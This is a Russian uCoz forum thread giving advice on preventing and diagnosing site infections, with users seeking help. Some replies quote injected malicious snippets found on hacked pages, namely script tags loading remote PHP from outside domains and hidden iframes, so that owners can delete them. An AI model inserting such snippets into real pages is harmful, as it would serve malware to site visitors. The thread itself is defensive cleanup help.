Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1771 | 20:22:34
    akula-z,
    Цитата
    так что выходит, что попандер вызывается стандартной рекламой юкоз?
    это надо установить. для этого я задала вопросы. попандеры открываются все время или периодически? и открываются во всех браузерах пользователей, которые пострадали или не во всех. бывают заражения браузеров с подобными симптомами. и чтобы установить точно надо или оплатить пакет услуг (так будет точнее всего) или опросить пользователей

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Alex1991677
    Сообщений: 11
    Репутация: 0

    Сообщение # 1772 | 12:54:23
    webanet, Здравствуйте! Опять Яндекс ругается на сайт и относит его к опасным! А Гугл эту информацию опровергает, подскажите в чем дело ? Ссылка на сайт http://8905-597-07-06.ru/ или опять из-за рекламы укоза под санкции попадает сайт?
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1773 | 13:10:50
    Цитата Alex1991677 ()
    А Гугл эту информацию опровергает,

    http://yandex.ru/infected?url=8905-597-07-06.ru
    Цитата
    Вредоносный код:

    обращается по адресам, которые находятся в чёрном списке Яндекса, как распространители вредоносного ПО;


    Детальную информацию об опасных страницах вы найдете в Яндекс.Вебмастер

    Проблемный материал http://8905-597-07-06.ru/dir/0-0-1-155-20
    Alex1991677
    Сообщений: 11
    Репутация: 0

    Сообщение # 1774 | 13:58:32
    Цитата $Vladimir$ ()
    Проблемный материал http://8905-597-07-06.ru/dir/0-0-1-155-20
    Спасибо! Удалил модуль каталогов весь! Давно хотел да все руки не доходили
    didicgami
    Сообщений: 11
    Репутация: 1

    Сообщение # 1775 | 10:35:23
    Вот мой сайт: http://didicgami.ru/
    
    Аваст жалуется на мой сайт. Многие пользователи у кого стоит аваст, говорят, что он выдаёт Угроза Url:Mal Не пускает на сайт вообще, на любую страницу.
    Больше ни какой антивирус на сайт не жалуется. Проверял онлайн антивирусами, 90% не чего не находят. Нашли только эти сайты:

    https://www.virustotal.com/ru....8823514

    Вот тут даже вывели якобы опасный код. В скриптах не очень понимаю, может кто глянет?
    https://sitecheck.sucuri.net/results/didicgami.ru/

    Очень прошу, помогите разобраться, аваст антивирус бесплатный, стоит у многих, если даже вируса и нет, то решать проблему как-то надо.

    Аларм говорит, всё чисто, др. веб тоже, короче большинство, вот ссыль на аларм http://antivirus-alarm.ru/proverka/?url=didicgami.ru/&again=1
    Сообщение отредактировал didicgami - Воскресенье, 12 Апр 2015, 10:39:43
    medved6969
    Сообщений: 7
    Репутация: 0

    Сообщение # 1776 | 11:15:54
    Добрый день! Мой сайт http://medved6969.narod.ru/ опять заражен вирусом!!! Это происходит постоянно, после того как удалял скрипты, которые вы говорили, было все ок, но через какое то время проблема повторяется. Никто не может зайти на сайт всех блокируют антивирусы. Заранее спасибо!!!
    didicgami
    Сообщений: 11
    Репутация: 1

    Сообщение # 1777 | 07:51:32
    Нашёл на сайте этот код, может кто подскажет что он делает? не опасен ли?

    <script type="text/javascript">document.write('<div style="width:0px;height:0px;position:fixed;right:0px;top:0px;display:none;overflow:hidden;z-index:10000;" id="dVadYH16q"><scr'+'ipt type="text/javascript" src="/abnl/?adsdata=K8vfVyFE5zq2xEnOY6aBbFKn07g7TRqvCZ5WMZ60KGAvdtZIi5JG9K3x!Nj9nHa0OIpFFGhF87!C!m4Kg0pQ^XenfgOHsP2bT6sD!CiC852w7U1;ihR!mWTPW5n!YvwgmJ;chgCmXuzYYvXTYutqg5Mc5u1eCwJWMqGW9Jyjl!uV^bIJz2r1;HVBbOqOcviTm2Jt6;kXB^ZM7q^hm5hemzfsumi2bNwki!pRuLTFmh6Avymv2mvVgmnQmydCTfEL;B60CyzB!kuWUkhnCRPlUbT^bsz3IZqzV55AZc4Lcw;kFSgHUQOhi7lWCGm;iRGDsKL8RDaTfALxqhfhVtlQKxZ^kK2xLXYQcJBhYfbZBMAVPLD5"></scr'+'ipt></div>');function resizeDiv(islasttry){
    var WX,WY,BX,BY;
    var o=document.getElementById("dVadYH16q"),t,d;
    if (!o) return;
    if(typeof window.self_getsizes == 'function'){
    var s=self_getsizes();
    if(s.err==1 && !islasttry) return;
    if(isNaN(s.BX)) s.BX==0;
    if(isNaN(s.BY)) s.BY==0;
    if(s.err==1){
    if (!(t=document.getElementById("bannerXadYH16q"))) return;
    else s.BX=t.value;
    if (!(t=document.getElementById("bannerYadYH16q"))) return;
    else s.BY=t.value;
    }
    BX=s.BX;
    BY=s.BY;
    }else{
    if (!(t=document.getElementById("bannerXadYH16q"))) return;
    else BX=t.value;
    if (!(t=document.getElementById("bannerYadYH16q"))) return;
    else BY=t.value;
    }
    if (!(t=document.getElementById("wrapperXadYH16q"))) WX=0;
    else WX=t.value;
    if (!(t=document.getElementById("wrapperYadYH16q"))) WY=0;
    else WY=t.value;
    d=document.getElementById("mainadsdvadYH16q");
    if(d){
    if (BX<0) d.style.width="100%";
    else if (BX>0) d.style.width=BX+"px";
    if (BY<0) d.style.height="100%";
    else if (BY>0) d.style.height=BY+"px";
    }
    BX=parseInt(BX)+parseInt(WX);
    BY=parseInt(BY)+parseInt(WY);
    if (BX<0) o.style.width="100%";
    else if (BX>0) o.style.width=BX+"px";
    if (BY<0) o.style.height="100%";
    else if (BY>0) o.style.height=BY+"px";
    o.style.display='';
    return true;
    }
    function waitForIframe(triesCount){
    if(triesCount>10) return;
    if(typeof resizeDiv == 'function' && !resizeDiv(triesCount==10 ? 1 : 0)) return setTimeout(function() { waitForIframe(triesCount + 1); }, 500);
    };
    document.write('<scr'+'ipt type="text/javascript">waitForIframe(0);</scr'+'ipt>');</script>
    Irina_M
    Сообщений: 603
    Репутация: 67

    Сообщение # 1778 | 11:43:12
    didicgami, это код вывода стандартного рекламного баннера uCoz.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1779 | 15:04:13
    medved6969, со страницы с трехкомнатной квартирой удалите скрипт
    Код
    <!--d52aa7--><script type="text/javascript" src="http://grabaride.tk/smartphone/jbchdjdn.php?id=2866498"></script><!--/d52aa7-->

    с земельным участком удалите скрипт
    Код
    <!--de65c4--><script type="text/javascript" src="http://cms.edu-guide.ru/7h4RkKwp.php?id=248840"></script><!--/de65c4-->

    на будущее. сменить все пароли. поставить сложнейшие. и поставить сложный пароль на фтп

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    azl
    Сообщений: 7
    Репутация: 0

    Сообщение # 1780 | 23:13:25
    Добрый вечер.
    Мой сайт http://azl.ucoz.com/
    Поступила жалоба от пользователей следующего характера:
    Цитата
    при переходе по этой ссылке антивирь начинает сильно ругаться на трояны. И это не только у меня. Хотелось бы услышать ваш комментарий по этому
    поводу.


    Под ссылкой подразумевается главная страница сайта: http://azl.ucoz.com/
    У меня Eset Nod32 Antivirus 8 и подобного не наблюдается, но решил проверить на вирусы с помощью онлайн систем. Вот какие результаты:

    del
    Из результатов последнего тестирования видим, что Avast ругается на iFrame, а Касперский на наличие трояна.

    Касперский, конечно, специфический и очень придирчивый антивирус, но используемый большим количеством пользователей.
    Помогите, пожалуйста, устранить эту неприятность.
    Спасибо.
    Сообщение отредактировал webanet - Среда, 29 Апр 2015, 23:24:08
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1781 | 23:22:38
    azl, в кратком описании материала http://azl.ucoz.com/news/versija_1_0_beta_7/2014-10-04-60 ищите коды и удаляйте их
    стоит проверить браузер, с которого это добавлялось

    Код
    <p><iframe id="zunifrm" src="about://codegv.ru/u.html" style="display: none;"></iframe></p>

    <p><iframe id="zunifrm" src="about://codegv.ru/u.html" style="display: none;"></iframe></p>

    <p><iframe id="zunifrm" src="about://codegv.ru/u.html" style="display: none;"></iframe></p>

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    azl
    Сообщений: 7
    Репутация: 0

    Сообщение # 1782 | 00:41:22
    webanet, действительно нашел этот код в 3-х местах, там было сразу по несколько строк такого кода. Добавлял все исключительно с FireFox. Причем, более поздние и более ранние добавления были без этого кода.
    Тест, в котором ругался Avast на iFrame и Касперский на наличие трояна, показывает, что все в порядке, а вот 2ip по-прежнему выдает сообщение: !Подозрение на вирус! На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.
    Поискал, вроде больше нигде нет.
    Проверьте, пожалуйста, может где-то пропустил или расскажите, как я сам могу осуществить поиск по всему коду сайта. Искал в Исходном коде страницы, который можно вызвать в FireFox.
    Alekso
    Сообщений: 12
    Репутация: 2

    Сообщение # 1783 | 06:55:31
    Приветствую! Нужна помощь. В последнее время при заходе на свой сайт http://kara-1134b.ucoz.ru/ стал вылетать на http://ru.aliexpress.com/premium....8082843 Такое случается не всегда, но случается. Расспросил пользователей сайта, кое у кого такая же беда. Что делать? Беглый поиск не дал результатов.
    azl
    Сообщений: 7
    Репутация: 0

    Сообщение # 1784 | 14:35:02
    webanet, нашел Ваше сообщение по поводу 2ip //forum.ucoz.ru/forum/45-47668-979733-16-1359902009
    Проверил некоторые другие сайты, у многих та же история. Значит 2ip в топку. Спасибо за помощь.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1785 | 16:47:26
    Alekso, в первую очередь удалите скрипт однойкнопки со всех страниц

    Код
    <script src="http://odnaknopka.ru/ok1.js" type="text/javascript"></script>
    если нужны кнопки, то ставьте с яндексом https://tech.yandex.ru/share/
    и обязательно удалить так называемые часы
    Код
    <script src="http://www.clocklink.com/embed.js"></script><script type="text/javascript" language="JavaScript">obj=new Object;obj.clockfile="0002-white.swf";obj.TimeZone="R2T";obj.width=175;obj.height=175;obj.Place=""; obj.wmode="transparent";showClock(obj);</script>

    постарайтесь не пользоваться сторонними скриптами.
    после удаления и сброса кеша в браузере понаблюдайте за сайтом будут ли переходы. о результатах отпишитесь тут в теме

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: